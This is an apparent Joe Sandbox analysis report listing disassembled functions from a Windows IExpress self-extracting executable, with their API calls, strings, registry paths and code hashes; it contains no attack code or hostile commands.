Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
Instruction ID: 59d02ef60f38a3f9e6903949d29a05c9a4fc13555c05f8657f783663e53204d2
Opcode Fuzzy Hash: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
Instruction Fuzzy Hash: 5AB09221F25442C1D614AB21DC951A013A0BB5C32DFC00830C00DC0130DE1D919B8705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB1461EC Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 97
registryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNELBASE ref: 00007FF6EB146231
DeleteFileA.KERNELBASE ref: 00007FF6EB146240
LocalFree.KERNEL32 ref: 00007FF6EB146253
LocalFree.KERNEL32 ref: 00007FF6EB146262
SetCurrentDirectoryA.KERNELBASE ref: 00007FF6EB1462FB
RegOpenKeyExA.KERNELBASE ref: 00007FF6EB14634E
RegDeleteValueA.KERNELBASE ref: 00007FF6EB14636A
RegCloseKey.ADVAPI32 ref: 00007FF6EB14637B

Strings

wextract_cleanup0, xrefs: 00007FF6EB146363
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00007FF6EB146340
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6EB14629C

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
API String ID: 3049360512-2202052387
Opcode ID: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
Instruction ID: 9db7f597c32fca846aa45bcec1be2f456b8ee463dd8516dd8b2517baa36e8deb
Opcode Fuzzy Hash: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
Instruction Fuzzy Hash: 2B510E73A0868286EB108B54E4543F977B0FB4DBADF444171C54D866B4CF3EE846C70A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB142318 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE ref: 00007FF6EB14236D
RegQueryValueExA.KERNELBASE ref: 00007FF6EB14239C
RegCloseKey.KERNELBASE ref: 00007FF6EB1423B7
RegOpenKeyExA.ADVAPI32 ref: 00007FF6EB1423EE
RegQueryInfoKeyA.ADVAPI32 ref: 00007FF6EB142436

Strings

PendingFileRenameOperations, xrefs: 00007FF6EB14238A
System\CurrentControlSet\Control\Session Manager, xrefs: 00007FF6EB14235F
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00007FF6EB1423E0

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
Instruction ID: 065691f2cce41c5636028c0452cffbd121bb12b4646ce1753dc5f24842beb785
Opcode Fuzzy Hash: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
Instruction Fuzzy Hash: 1D315E33A18B41CAE7208F25E8406E9B7A4FB8D7ACF444535E64D83B64DF39D191CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB1463B8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6EB14114C: _vsnprintf.MSVCRT ref: 00007FF6EB141189

RemoveDirectoryA.KERNELBASE(0000000A,00007FF6EB142CE1), ref: 00007FF6EB146423
GetFileAttributesA.KERNELBASE ref: 00007FF6EB146432
GetTempFileNameA.KERNEL32 ref: 00007FF6EB14645B
DeleteFileA.KERNEL32 ref: 00007FF6EB146473
CreateDirectoryA.KERNEL32 ref: 00007FF6EB146484
CreateDirectoryA.KERNELBASE ref: 00007FF6EB1464BB

Strings

IXP, xrefs: 00007FF6EB14644E
IXP%03d.TMP, xrefs: 00007FF6EB1463E6

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: IXP$IXP%03d.TMP
API String ID: 1082909758-3932986939
Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
Instruction ID: cf3b964cda0520bdf6a898d4ad3622a21899b883d79590ee716ef78b72743434
Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
Instruction Fuzzy Hash: 70217372A089418AE7209B22E9503F96761FB8EBEDF448130DD4E837B5CF3DD446C606

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB148200 Relevance: 12.1, APIs: 8, Instructions: 136
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6EB148964: GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6EB148994
Part of subcall function 00007FF6EB148964: GetCurrentProcessId.KERNEL32 ref: 00007FF6EB1489A2
Part of subcall function 00007FF6EB148964: GetCurrentThreadId.KERNEL32 ref: 00007FF6EB1489AE
Part of subcall function 00007FF6EB148964: GetTickCount.KERNEL32 ref: 00007FF6EB1489BA
Part of subcall function 00007FF6EB148964: GetTickCount.KERNEL32 ref: 00007FF6EB1489CA
Part of subcall function 00007FF6EB148964: QueryPerformanceCounter.KERNEL32 ref: 00007FF6EB1489E5

GetStartupInfoW.KERNEL32 ref: 00007FF6EB148235
_amsg_exit.MSVCRT ref: 00007FF6EB148270
Sleep.KERNEL32 ref: 00007FF6EB14827C
_initterm.MSVCRT ref: 00007FF6EB14830A
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6EB148337
exit.KERNELBASE ref: 00007FF6EB1483C9
_cexit.MSVCRT ref: 00007FF6EB1483D8
_ismbblead.MSVCRT ref: 00007FF6EB1483F8

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
String ID:
API String ID: 2995914023-0
Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
Instruction ID: ad4a2f57e4e8eb107a2257bf19c39515c5634a4d35dcf370b969ff5cf93cae02
Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
Instruction Fuzzy Hash: AB512E33908A428AE7618B65E8547F522A0FB4C7BCF540035D94DC62B5DF7EE583C70A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB1460A4 Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EB145050: FindResourceA.KERNEL32 ref: 00007FF6EB145078
Part of subcall function 00007FF6EB145050: SizeofResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB145089
Part of subcall function 00007FF6EB145050: FindResourceA.KERNEL32 ref: 00007FF6EB1450AF
Part of subcall function 00007FF6EB145050: LoadResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450C0
Part of subcall function 00007FF6EB145050: LockResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450CF
Part of subcall function 00007FF6EB145050: memcpy_s.MSVCRT ref: 00007FF6EB1450EE
Part of subcall function 00007FF6EB145050: FreeResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450FD

LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF6EB143123), ref: 00007FF6EB1460C9
LocalFree.KERNEL32 ref: 00007FF6EB146142

Part of subcall function 00007FF6EB144DCC: LoadStringA.USER32 ref: 00007FF6EB144E60
Part of subcall function 00007FF6EB144DCC: MessageBoxA.USER32 ref: 00007FF6EB144EA0

Part of subcall function 00007FF6EB147700: GetLastError.KERNEL32 ref: 00007FF6EB147704

Strings

, xrefs: 00007FF6EB146198
<None>, xrefs: 00007FF6EB14615A
UPROMPT, xrefs: 00007FF6EB1460B1, 00007FF6EB14610E

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: $<None>$UPROMPT
API String ID: 957408736-2569542085
Opcode ID: d991cf03d25efc3a9063d06e2e189d8e0f796ad0d7c3821099a1f195ae0dd795
Instruction ID: 029966e5ec9e77650c1ec76a8d9db899a56f7a92a6401026d7133c1ea8c4e7b5
Opcode Fuzzy Hash: d991cf03d25efc3a9063d06e2e189d8e0f796ad0d7c3821099a1f195ae0dd795
Instruction Fuzzy Hash: BD318673A082428BF7205B60E5507F97661EB9E7ACF404135CA0E866B5DF7ED406870A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB145380 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 164filestringCOMMON

Download Yara Rule

APIs

lstrcmpA.KERNEL32 ref: 00007FF6EB145407
CreateFileA.KERNELBASE ref: 00007FF6EB1454C5
CreateFileA.KERNEL32 ref: 00007FF6EB14557E

Strings

*MEMCAB, xrefs: 00007FF6EB1453FD

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: CreateFile$lstrcmp
String ID: *MEMCAB
API String ID: 1301100335-3211172518
Opcode ID: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
Instruction ID: b1fdd9fc7c50f7007f4ce69ca48382e2a9799d27311adaa2c73f5f1158441cff
Opcode Fuzzy Hash: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
Instruction Fuzzy Hash: B661C773A0874186F7608B15A4813B97A91EB4EBBCF444331CA6D877E0DF7DE5078609

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB1458B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 152timeCOMMON

Download Yara Rule

APIs

DosDateTimeToFileTime.KERNEL32 ref: 00007FF6EB14598F
LocalFileTimeToFileTime.KERNEL32 ref: 00007FF6EB1459AD
SetFileTime.KERNELBASE ref: 00007FF6EB1459D5
SetFileAttributesA.KERNELBASE ref: 00007FF6EB145A0B
SetDlgItemTextA.USER32 ref: 00007FF6EB145A3E

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6EB14593B, 00007FF6EB145A5A

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: FileTime$AttributesDateItemLocalText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 851750970-2312194364
Opcode ID: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
Instruction ID: 4095f4edf1e9685ac51b72d2256870e0380c3099853b313436bdead08bc3c46f
Opcode Fuzzy Hash: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
Instruction Fuzzy Hash: 7D516033A1864385EA609B21D4503F927A0FB4DBBCF545132DA4E832A5CE3EE947C74A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB146B70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FF6EB146BA0

Strings

TMP4351$.TMP, xrefs: 00007FF6EB146C03

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: AllocLocal
String ID: TMP4351$.TMP
API String ID: 3494564517-2619824408
Opcode ID: d5ace99f2663905ba72166a92556dafad1272f0db083ef97e46a8f7b12bd3ef1
Instruction ID: 2455691290057662a0ef8a3f8b0fd24a268313960a8b6a3cd3098843a5bc2eda
Opcode Fuzzy Hash: d5ace99f2663905ba72166a92556dafad1272f0db083ef97e46a8f7b12bd3ef1
Instruction Fuzzy Hash: 46318672A0874147F7105B61A4103BA7660EB89BBDF445334DA6E477E5CF7DD407870A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB143F74 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 71memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EB145050: FindResourceA.KERNEL32 ref: 00007FF6EB145078
Part of subcall function 00007FF6EB145050: SizeofResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB145089
Part of subcall function 00007FF6EB145050: FindResourceA.KERNEL32 ref: 00007FF6EB1450AF
Part of subcall function 00007FF6EB145050: LoadResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450C0
Part of subcall function 00007FF6EB145050: LockResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450CF
Part of subcall function 00007FF6EB145050: memcpy_s.MSVCRT ref: 00007FF6EB1450EE
Part of subcall function 00007FF6EB145050: FreeResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450FD

LocalAlloc.KERNEL32(?,?,?,?,?,00007FF6EB143139), ref: 00007FF6EB143F95
LocalFree.KERNEL32 ref: 00007FF6EB144018

Part of subcall function 00007FF6EB144DCC: LoadStringA.USER32 ref: 00007FF6EB144E60
Part of subcall function 00007FF6EB144DCC: MessageBoxA.USER32 ref: 00007FF6EB144EA0

Part of subcall function 00007FF6EB147700: GetLastError.KERNEL32 ref: 00007FF6EB147704

lstrcmpA.KERNEL32(?,?,?,?,?,00007FF6EB143139), ref: 00007FF6EB14403E
LocalFree.KERNEL32(?,?,?,?,?,00007FF6EB143139), ref: 00007FF6EB14409F

Part of subcall function 00007FF6EB147AC8: FindResourceA.KERNEL32 ref: 00007FF6EB147AF2
Part of subcall function 00007FF6EB147AC8: LoadResource.KERNEL32 ref: 00007FF6EB147B09
Part of subcall function 00007FF6EB147AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF6EB147B3F
Part of subcall function 00007FF6EB147AC8: FreeResource.KERNEL32 ref: 00007FF6EB147B51

LocalFree.KERNEL32 ref: 00007FF6EB144078

Strings

<None>, xrefs: 00007FF6EB144037
LICENSE, xrefs: 00007FF6EB143F7D, 00007FF6EB143FE0

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 83e75f83dd84bbce3bdd96c653730240a7eff5f3520957c81dbcc58c58addb4b
Instruction ID: 69c524469ee62d624b6ff1ab166bd7165c9d87ea3362c9cf3d9a6ea7f7b36e8d
Opcode Fuzzy Hash: 83e75f83dd84bbce3bdd96c653730240a7eff5f3520957c81dbcc58c58addb4b
Instruction Fuzzy Hash: B2312D33A196068AFB209F20E4157FA7661FB9D7ADF404135D90D876B0DF7EE406870A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB145C60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

#20.CABINET ref: 00007FF6EB145CD9
#21.CABINET ref: 00007FF6EB145D18
#23.CABINET ref: 00007FF6EB145D52

Strings

*MEMCAB, xrefs: 00007FF6EB145CF2

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID:
String ID: *MEMCAB
API String ID: 0-3211172518
Opcode ID: 2085e244be9a75c0329170706bb6144b0415b504333b66df14c927118817c01a
Instruction ID: 6f855aafa0cc7191682f8c3099a97de02443e7d9de506a071781137aa26a6df3
Opcode Fuzzy Hash: 2085e244be9a75c0329170706bb6144b0415b504333b66df14c927118817c01a
Instruction Fuzzy Hash: E0312A32A08B42C5EA508B51E4483F977A0BF49BBCF944236D55D827B4EF3EE446C706

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB145690 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EB143B40: MsgWaitForMultipleObjects.USER32 ref: 00007FF6EB143B64
Part of subcall function 00007FF6EB143B40: PeekMessageA.USER32 ref: 00007FF6EB143B89
Part of subcall function 00007FF6EB143B40: PeekMessageA.USER32 ref: 00007FF6EB143BCD

WriteFile.KERNELBASE ref: 00007FF6EB1456E4

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: 2a76a806002c51afc5401a5001571f8213dae6f688e945ba72fdbdbea0bf890e
Instruction ID: f9b830567094021f6dbb4ce039d50273cba9023d78e4466fe55c68d0d0d90fd1
Opcode Fuzzy Hash: 2a76a806002c51afc5401a5001571f8213dae6f688e945ba72fdbdbea0bf890e
Instruction Fuzzy Hash: CF216232A0854286EB108F15E8447B5B7A1FB8DBBCF548235D95D86AB4CF7ED406CB09

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB1451BC Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE ref: 00007FF6EB1451C9
SetFileAttributesA.KERNEL32 ref: 00007FF6EB14524E

Part of subcall function 00007FF6EB147AC8: FindResourceA.KERNEL32 ref: 00007FF6EB147AF2
Part of subcall function 00007FF6EB147AC8: LoadResource.KERNEL32 ref: 00007FF6EB147B09
Part of subcall function 00007FF6EB147AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF6EB147B3F
Part of subcall function 00007FF6EB147AC8: FreeResource.KERNEL32 ref: 00007FF6EB147B51

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 2018477427-0
Opcode ID: ded777603aae7cf846a654b588ac2905db21abed33c2a04ac96d39e62aa9a68d
Instruction ID: dc3b7cfa6f7da28cf784c7123ad8e689903e2ebc271cae7e607d40053f43e755
Opcode Fuzzy Hash: ded777603aae7cf846a654b588ac2905db21abed33c2a04ac96d39e62aa9a68d
Instruction Fuzzy Hash: 63115E33A0C64286F6504B14A5847F566A0EB4E77CF284235C94D866B5CF7FE987C70A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB147BA8 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CharPrevA.USER32 ref: 00007FF6EB147BEF

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
Instruction ID: 59163a117b906727b2cf247c61c0e44264bf0fed64d1ab8e03bc7db453ca4949
Opcode Fuzzy Hash: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
Instruction Fuzzy Hash: AA01266290C7C286F3124F51A8403AABA90A70ABFCF589230DB69477E5CF2DD443870A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB145770 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 00007FF6EB1457A9

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
Instruction ID: 24795b1a77ce09593785e0554317269680b9788f9dc18ec516022f66465620e2
Opcode Fuzzy Hash: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
Instruction Fuzzy Hash: F0F03632608781D2DB1C4F25F5813B87660EB4DB6DF544235DA2B876D4CF79D482C715

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF6EB143530 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 174windowCOMMON

Download Yara Rule

APIs

LoadStringA.USER32 ref: 00007FF6EB1435AA
EndDialog.USER32 ref: 00007FF6EB14374E
